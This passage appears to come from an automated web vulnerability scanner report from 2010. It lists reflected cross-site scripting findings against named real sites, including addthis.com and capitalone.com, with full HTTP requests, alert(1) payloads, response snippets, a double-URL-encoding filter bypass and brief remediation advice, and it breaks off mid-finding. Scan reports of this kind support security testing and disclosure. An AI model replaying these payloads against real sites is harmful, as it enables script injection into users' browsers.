GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?&e4263"><script>alert(1)</script>47a9821c38b=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7954 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:20 GMT
4.100. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/262034929/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 474bf'-alert(1)-'4af2cfca2fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?&474bf'-alert(1)-'4af2cfca2fd=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7879 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:22 GMT
4.101. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/262034929/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2511"-alert(1)-"82aa410db36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?&c2511"-alert(1)-"82aa410db36=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7852 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:21 GMT
The value of the &t202id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 657cd"><script>alert(1)</script>8d46ffd6598 was submitted in the &t202id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?&t202id=bng657cd"><script>alert(1)</script>8d46ffd6598&t202kw=news&c3=dp HTTP/1.1 Host: weekly-consumer-tips.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:34:48 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 63362
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="step_1.php?t202id=bng657cd"><script>alert(1)</script>8d46ffd6598&t202kw=news&c3=dp" title="home"> ...[SNIP]...
The value of the c3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba1c"><script>alert(1)</script>03f461f4e52 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?&t202id=bng&t202kw=news&c3=dp1ba1c"><script>alert(1)</script>03f461f4e52 HTTP/1.1 Host: weekly-consumer-tips.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:34:58 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 63362
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="step_1.php?t202id=bng&t202kw=news&c3=dp1ba1c"><script>alert(1)</script>03f461f4e52" title="home"> ...[SNIP]...
The value of the t202kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d84e"><script>alert(1)</script>35f0e42117f was submitted in the t202kw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?&t202id=bng&t202kw=news7d84e"><script>alert(1)</script>35f0e42117f&c3=dp HTTP/1.1 Host: weekly-consumer-tips.com Proxy-Connection: keep-alive Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:34:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 63362
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a href="step_1.php?t202id=bng&t202kw=news7d84e"><script>alert(1)</script>35f0e42117f&c3=dp" title="home"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ead2b"-alert(1)-"1639121d17f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phpead2b"-alert(1)-"1639121d17f HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 08 Dec 2010 01:31:01 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=7sdiiv5o9au0qcn8gquiiejst1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phpead2b"-alert(1)-"1639121d17f"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 24144<script>alert(1)</script>db5e1533f31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php24144<script>alert(1)</script>db5e1533f31 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 08 Dec 2010 01:31:04 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=2msfjku5no4hifcf3m67uff9b7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php24144<script>alert(1)</script>db5e1533f31</strong> ...[SNIP]...
4.107. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62d1f"-alert(1)-"c67c58fd361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/62d1f"-alert(1)-"c67c58fd361 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:30:17 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 87499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/62d1f"-alert(1)-"c67c58fd361"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2fdf"><a>c3427942551 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /members/Blogb2fdf"><a>c3427942551/JimGintonio HTTP/1.1 Host: www.azcentral.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:32:47 GMT Server: Apache X-Powered-By: PHP/5.3.1 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM", policyref="/w3c/p3p.xml" Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 35533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the linkid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca646"><a>91c2cd96a28 was submitted in the linkid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /directbanking/interest-online-checking-account/index.php?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646"><a>91c2cd96a28 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:33:31 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 20927
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/interest-online-checking-account/index.php?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646"><a>91c2cd96a28" name="dest"> ...[SNIP]...
4.110. http://www.capitalone.com/directbanking/interest-online-checking-account/index.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ca6"><a>3b422ca6a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /directbanking/interest-online-checking-account/index.php?19ca6"><a>3b422ca6a4f=1 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:34:08 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 20900
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/interest-online-checking-account/index.php?19ca6"><a>3b422ca6a4f=1" name="dest"> ...[SNIP]...
4.111. http://www.capitalone.com/directbanking/interest-online-checking-account/index.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10989%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94c9ae6e12f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10989"><script>alert(1)</script>94c9ae6e12f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /directbanking/interest-online-checking-account/index.php/10989%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94c9ae6e12f HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:34:26 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 20921
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/interest-online-checking-account/index.php/10989"><script>alert(1)</script>94c9ae6e12f?" name="dest"> ...[SNIP]...
The value of the linkid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a6d3"><a>3fa9470107b was submitted in the linkid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /directbanking/rewards-online-checking-account/index.php?linkid=WWW_Z_Z_Z__C2_02_T_SP17a6d3"><a>3fa9470107b HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:33:36 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 20923
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/rewards-online-checking-account/index.php?linkid=WWW_Z_Z_Z__C2_02_T_SP17a6d3"><a>3fa9470107b" name="dest"> ...[SNIP]...
4.113. http://www.capitalone.com/directbanking/rewards-online-checking-account/index.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42742%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e381a25200 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42742"><script>alert(1)</script>9e381a25200 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /directbanking/rewards-online-checking-account/index.php/42742%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e381a25200 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: external_id=WWW_124_ZZ_DB-ONL-CPM_LB_Z_Z_G_DB_27; smartTracking=; LP_GROUP=NDBCHAT_T_GRP; BIGipServerpl_capitalone.com_80=812197130.29215.0000; dbPhoneNumber=D-fkxyq3cLcx6Ure8NAnH; itc=CAPITALONE11123PINTMKTGDF; v1st=CA9A14180625EFAA;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 01:34:24 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 20917
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title> ...[SNIP]... <input type="hidden" value="/directbanking/rewards-online-checking-account/index.php/42742"><script>alert(1)</script>9e381a25200?" name="dest"> ...[SNIP]...
4.114. http://www.capitalone.com/directbanking/rewards-online-checking-account/index.php [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 886ff"><a>d6272b7f5f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
